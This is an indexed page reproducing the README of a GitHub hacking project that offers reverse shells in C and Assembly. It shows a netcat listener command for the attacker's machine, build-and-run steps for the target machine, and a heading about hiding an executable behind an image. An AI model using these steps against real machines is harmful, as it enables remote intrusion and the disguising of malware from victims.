An open API service indexing awesome lists of open source software.

https://github.com/dewebdes/bismil

C HACK TOOL
https://github.com/dewebdes/bismil

Last synced: about 1 year ago
JSON representation

C HACK TOOL

Awesome Lists containing this project

README

          

BISMIL


Pure way to start hacking programming in C and Assembly languages


ON ATTACK BOX RUN:


nc -lvp 444


ON TARGET BOX:



  • We need an signal, like exe file or just a tcp request


  • PURE C Sample


    gcc rsv.c -o rsv

    sudo ./rsv




  • ASM Sample


    nasm -f elf32 reverse_tcp.asm && ld -m elf_i386 reverse_tcp.o -o reverse_tcp






How to Prevent Reverse Shell?




Hide EXE Behind Image





Read More About ; PURE HACKING DEVELOPMENT ;